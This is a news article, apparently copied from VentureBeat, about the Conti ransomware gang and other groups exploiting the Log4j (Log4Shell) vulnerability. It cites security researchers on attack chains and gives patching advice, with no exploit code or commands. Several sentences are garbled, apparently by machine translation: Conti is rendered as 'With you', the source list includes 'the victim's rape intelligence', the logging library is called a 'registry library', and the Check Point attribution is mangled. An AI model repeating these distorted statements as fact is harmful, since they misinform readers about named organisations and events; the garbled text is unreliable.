Log4j flaw gets a lot of attention from ‘ruthless’ ransomware gang


Hear from CIOs, CTOs, and other senior and C-level executives on AI data and strategy at the Future of Work Summit on January 12, 2022. Learn more

The prominent ransomware gang Conti has expanded its efforts to exploit the Apache Log4j vulnerability, probably seeing the generalized defect as the basis for a new wave of attacks, according to security researchers.

Researchers from cybersecurity firms Qualys and AdvIntel told VentureBeat that they have observed activities by Conti to exploit the critical vulnerability in Log4j logging software, known as Log4Shell, in recent days.

Qualys has observed “attempted ransomware attacks, some of which have been successful, by Conti, Khonsari, and some nation-state-backed adversaries,” Travis Smith, director of malware threat research at Qualys, said in an email. email to VentureBeat. Details of the attacks were not disclosed.

Meanwhile, AdvIntel shared the findings with VentureBeat stating that Conti has assembled an entire attack chain around the Log4Shell vulnerability and launched initial attack attempts. Late last week, AdvIntel became the first cyber company to report spot Conti in action around the Log4j vulnerability.

So far, there has been no public disclosure of a successful ransomware breach stemming from the Log4j vulnerability. But the widespread and trivial flaw to exploit in Log4j “is a dream come true for ransomware groups,” Eyal Dotan, Cameyo founder and chief technology officer, said in an email.

Complete chain of attack

Khonsari, which was the first publicly ransomware family disclosed By researchers to exploit Log4Shell, the Conti and TellYouThePass ransomware families have now joined, according to the researchers.

In its December 17 report, AdvIntel said that Conti has been observed to be exploiting the vulnerability in Log4j to gain access and move laterally on vulnerable VMware vCenter servers.

Since publishing that report, AdvIntel has observed additional activities from Conti around Log4Shell, the company told VentureBeat. In addition to identifying Conti’s complete chain of attack, “we have seen and observed the direct use [by Conti] in different cases targeting VMware vCenter, “said AdvIntel CEO Vitali Kremez in an email.

Conti’s chain of attack includes the deployment of the Emotet botnet and the use of Cobalt Strike for reconnaissance operations, privilege escalation, payload drop and data theft, Yelisey Boguslavskiy, AdvIntel’s head of research, said in an email. email to VentureBeat.

“For Conti, this is a huge leap in their offensive operations as they can now experiment and diversify their arsenal,” Boguslavskiy said. “This means that if a certain attack vector, such as VPN accesses, becomes less profitable, they can always compensate by investing more in Log4j. In addition, it gives them another advantage in competition with smaller groups that cannot afford the proper research to exploit these vulnerabilities efficiently. “

AdvIntel’s investigation into Conti’s activities relied on intelligence from the primary source, including the victim’s rape intelligence and post-incident response, it said.

In a statement in response to the AdvIntel report, VMware said that “the safety of our customers is our highest priority” and noted that it has issued a security notice which is periodically updated. “Any service connected to the Internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” the company said in the statement.

‘Relentless’ organization

With you is believed to be a Russian ransomware group that was previously called Wizard Spider. in a June reportRichard Hickman of Palo Alto Networks’ Unit 42 research group said that Conti “stands out as one of the most ruthless of the dozens of ransomware gangs we follow.”

“The group has spent more than a year targeting organizations where IT outages can have life-threatening consequences: hospitals, 911 carriers, emergency medical services and law enforcement agencies,” Hickman wrote in the report.

For example, a May 2021 attack in Ireland “shut down the entire information technology network of the nation’s healthcare system, leading to cancellation of appointments, shutdown of X-ray systems and delays in appointments. COVID testing, “he wrote.

According to the June report, the FBI had discovered that more than 400 cyberattacks were related to Conti, with three-quarters of the attacks against US-based organizations. Ransom demands have reached more than $ 25 million, which which also ranks Conti among the “” most greedy ransomware groups, “” Hickman wrote.

Sophisticated attacks

Conti plays an important role in today’s threat landscape because of its scale, Smith said.

“Conti is always behind ransomware and is incredibly strategic and tactical with his approach,” he said. “They don’t just send a lot of phishing emails, they look to entrench themselves in environments, and move as quietly as possible until they find the crown jewels.”

Because Log4Shell allows remote code execution by unauthenticated users, “it will make sophisticated actors like Conti very successful,” Smith said. “It will allow groups to reconnoitre, move laterally, and ultimately implement ransomware.”

Conti faces less of a challenge in how to exploit Log4j and more of a challenge in competing with other threat actors for the available attack opportunities, Dotan said. “The fastest ransomware groups capable of reaching the most vulnerable servers would be winning this race,” he said.

And while the major ransomware attacks stemming from Log4j have yet to come to light, that doesn’t mean ransomware groups aren’t busy preparing.

“If you’re an affiliate or a ransomware operator right now, all of a sudden you have access to all these new systems,” said Sean Gallagher, Senior Threat Researcher at Sophos Labs. “You have more work on your hands than you know what to do in this moment”.

Necessary preparations

Still, while the Log4j vulnerability itself is considered very easy to exploit, a great deal of groundwork is required to use it to implement ransomware. Post-exploit discovery work must be done before a major ransomware attack can be launched, said Ed Murphy, Huntress Product Manager.

“It is not a vulnerability that persists on your laptop and mine. So it’s not something that can just reach out and unleash a massive ‘spray and pray’ ransomware attack, “Murphy said in an interview.

Log4j affects servers, and most ransomware operators won’t want to just bail out a single server, which probably has backups, he noted.

“Where they really get a big chunk of their income is by being able to affect an entire organization,” Murphy said. “That’s the kind of chaos where people are most willing to pay those ransom demands.”

So after an attacker lands on a server on a corporate network, he will first have to figure out what other devices they can “talk” to from that server, he said. Then they’ll have to figure out what applications are running on those devices and figure out how to get from the server to the laptops that are connected to it, Murphy said.

This means that it could be some time before major ransomware attacks actually emerge from the discovery of Log4Shell. “There is activity that needs to happen after they’ve exploited the Log4j vulnerability to really gain more control over the network they landed on,” Murphy said.

Generalized vulnerability

Many business applications and cloud services written in Java are potentially vulnerable due to flaws in Log4j prior to version 2.17, which was released last Friday. The open source registry library is believed to be used in some way, either directly or indirectly, leveraging a Java framework, by most large organizations.

Log4j version 2.17 is the third patch for vulnerabilities in software since the initial discovery of a remote code execution (RCE) vulnerability on December 9. Security firm checkpoint reported On Monday, you have seen attempts to exploit vulnerabilities in Log4j in more than 48% of corporate networks worldwide.

The ransomware problem had already gotten a lot worse this year. During the first three quarters of 2021, SonicWall reported that ransomware attack attempts increased 148% year after year. CrowdStrike reports that the average ransomware payment increased by 63% in 2021, reaching $ 1.79 million.

Attempts to attack targets have been observed in the US and Europe using ransomware from the TellYouThePass family, Sophos researchers told VentureBeat. on Tuesday.

However, ransomware is just one of the many top threats posed by the Log4j vulnerability. There is a greater, but less visible danger related to Log4Shell, according to Dotan. And that’s the existence of “sophisticated hacker groups and state-backed hackers who do not intend to take advantage of this opportunity at this time,” he said.

Instead, those threat actors “would rather install a backdoor and secretly take control of the injected servers for the next several months, without their owners knowing,” Dotan said.


VentureBeat’s mission is to be a digital urban plaza for technical decision makers to gain insight into transformative technology and transact. Our site offers essential information on data technologies and strategies to guide you as you lead your organizations. We invite you to become a member of our community, to access:

  • updated information on the topics of your interest
  • our newsletters
  • Exclusive content from thought leaders and discounted access to our treasured events, such as Transform 2021: Learn more
  • network features and more

Become a member


Please enter your comment!
Please enter your name here